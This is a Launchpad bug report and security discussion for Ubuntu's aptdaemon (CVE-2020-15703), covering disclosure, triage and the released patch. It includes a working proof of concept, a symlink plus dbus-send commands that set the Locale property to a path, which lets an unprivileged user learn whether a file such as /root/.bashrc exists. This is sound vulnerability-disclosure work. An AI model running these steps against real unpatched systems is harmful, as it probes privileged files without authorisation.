Ubuntu
aptdaemon package

Improper Input Validation vulnerability in Locale property of a transaction leading to Information Disclosure

Bug #1888235 reported by Vaisha Bernard on 2020-07-20

268

This bug affects 1 person

Affects

Status

Importance

Assigned to

Milestone

aptdaemon (Ubuntu)

Fix Released

Undecided

Unassigned

You need to log in to change this bug's status.

Affecting:	aptdaemon (Ubuntu)
Filed here by:	Vaisha Bernard
When:	2020-07-20
Confirmed:	2020-08-28
Started work:	2020-09-01
Completed:	2020-09-24

Target

Distribution
Package	(Find…)
Project	(Find…)

Status	Importance
	Undecided

Assigned to

	Nobody
	Me

Comment on this change (optional)

Email me about changes to this bug report

(?)

Bug Description

Hi,

There is no input validation on the Locale property in an apt transaction. An unprivileged user can supply a full path to a writable directory, which lets aptd read a file as root. Having a symlink in place results in an error message if the file exists, and no error otherwise. This way an unprivileged user can check for the existence of any files on the system as root.

This is a similar type of bug as CVE-2015-1323.

See the attached Python script for details.

$ ./test_file_exists.py /root/.bashrc
File Exists!
$ ./test_file_exists.py /root/.bashrca
File does not exist!

Description: Ubuntu 20.04 LTS
Release: 20.04

aptdaemon:
  Installed: 1.1.1+bzr982-0ubuntu32.1
  Candidate: 1.1.1+bzr982-0ubuntu32.1
  Version table:
*** 1.1.1+bzr982-0ubuntu32.1 500
        500 http://nl.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages
        500 http://nl.archive.ubuntu.com/ubuntu focal-updates/main i386 Packages
        100 /var/lib/dpkg/status
     1.1.1+bzr982-0ubuntu32 500
        500 http://nl.archive.ubuntu.com/ubuntu focal/main amd64 Packages
        500 http://nl.archive.ubuntu.com/ubuntu focal/main i386 Packages

Kind regards,
Vaisha Bernard
EYE Control B.V.

Add tags Tag help

CVE References

Vaisha Bernard (vaisha) wrote on 2020-07-20:

test_file_exists.py Edit (1.2 KiB, text/x-python)

Alex Murray (alexmurray) wrote on 2020-07-21:

Yes I can confirm this is an issue and is quite similar to CVE-2015-1323 - like in https://bugs.launchpad.net/ubuntu/+source/aptdaemon/+bug/1449587 a simple bash example via dbus-send is enough to demonstrate this:

$ mkdir -p /tmp/a/LC_MESSAGES
$ ln -s /root/.bashrc /tmp/a/LC_MESSAGES/aptdaemon.mo
$ dbus-send --print-reply --system --dest=org.debian.apt \
    /org/debian/apt org.debian.apt.InstallFile \
    string:/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb \
    boolean:false
method return time=1595299798.945425 sender=:1.194 -> destination=:1.193 serial=7 reply_serial=2
   string "/org/debian/apt/transaction/51f737bf25f14db7be88bdc5139ea156"
$ dbus-send --print-reply --system --dest=org.debian.apt /org/debian/apt/transaction/51f737bf25f14db7be88bdc5139ea156 org.freedesktop.DBus.Properties.Set string:org.debian.apt.transaction string:Locale string:/tmp/a.
Error org.freedesktop.DBus.Python.OSError: Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
  File "/usr/lib/python3/dist-packages/aptdaemon/policykit1.py", line 152, in get_uid_from_dbus_name
    return_value(uid)
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 462, in return_value
    raise _DefGen_Return(val)
defer._DefGen_Return: 1000

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
result = gen.send(result)
StopIteration

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
  File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 1226, in _set_property
    self._set_locale(value)
  File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 835, in _set_locale
    self._translation = gettext.translation("aptdaemon",
  File "/usr/lib/python3.8/gettext.py", line 613, in translation
    t = _translations.setdefault(key, class_(fp))
  File "/usr/lib/python3.8/gettext.py", line 261, in __init__
    self._parse(fp)
  File "/usr/lib/python3.8/gettext.py", line 393, in _parse
    raise OSError(0, 'Bad magic number', filename)
OSError: [Errno 0] Bad magic number: '/tmp/a/LC_MESSAGES/aptdaemon.mo'

Can you confirm if this has been reported elsewhere and whether a CVE has already been assigned for this issue (via MITRE or some other CVE Naming Authority)?

Seth Arnold (seth-arnold) wrote on 2020-07-21:

Nice find.

Please use CVE-2020-15703 for this issue.

Thanks

Vaisha Bernard (vaisha) wrote on 2020-07-21:

> Can you confirm if this has been reported elsewhere and whether a CVE has already been assigned for this issue (via MITRE or some other CVE Naming Authority)?

Only here: https://bugs.launchpad.net/aptdaemon/+bug/1888232
Was unsure which of the two aptdaemon bugtrackers was the correct place to report this.

Alex Murray (alexmurray) wrote on 2020-07-21:

Ok I don't have access to that bug report so I can't see the activity there - I am assuming that perhaps there has been no response hence this bug report - would you be able to subscribe me to it?

Alex Murray (alexmurray) wrote on 2020-08-21:

FYI - I have duped https://bugs.launchpad.net/aptdaemon/+bug/1888232 against this bug to avoid any confusion (ie. this is the one-true-bug report for this issue).

Alex Murray (alexmurray) wrote on 2020-08-21:

Subscribing Julian for visibility.

Julian Andres Klode (juliank) on 2020-08-28

Changed in aptdaemon (Ubuntu):
status:	New → Triaged

Julian Andres Klode (juliank) wrote on 2020-09-01:

This should be easy to fix, a check for "/" in the locale name should suffice. Wondering whether Python should be fixed as well / instead though, such that locale._parselocale() does not consider ("/tmp/a.") a valid locale with language /tmp/a and region None.

Changed in aptdaemon (Ubuntu):
status:	Triaged → In Progress

Julian Andres Klode (juliank) wrote on 2020-09-01:

reject-paths-in-locale.patch Edit (771 bytes, text/plain)

Attached patch. Might need more changes, but this seems the right place. It makes it fail if the locale is a path with / in it. Not sure if we need to check other things.

I guess this applies to all releases.

Launchpad Janitor (janitor) wrote on 2020-09-24:

#10

This bug was fixed in the package aptdaemon - 1.1.1+bzr982-0ubuntu32.2

---------------
aptdaemon (1.1.1+bzr982-0ubuntu32.2) focal-security; urgency=medium

  * SECURITY UPDATE: information disclosure via locale (LP: #1888235)
    - debian/patches/CVE-2020-15703.patch: reject locales with full paths
      in aptdaemon/core.py.
    - CVE-2020-15703

-- Marc Deslauriers <email address hidden> Wed, 23 Sep 2020 07:20:14 -0400

Changed in aptdaemon (Ubuntu):
status:	In Progress → Fix Released

Launchpad Janitor (janitor) wrote on 2020-09-24:

#11

This bug was fixed in the package aptdaemon - 1.1.1+bzr982-0ubuntu19.4

---------------
aptdaemon (1.1.1+bzr982-0ubuntu19.4) bionic-security; urgency=medium

  * SECURITY UPDATE: information disclosure via locale (LP: #1888235)
    - debian/patches/CVE-2020-15703.patch: reject locales with full paths
      in aptdaemon/core.py.
    - CVE-2020-15703

-- Marc Deslauriers <email address hidden> Wed, 23 Sep 2020 07:27:57 -0400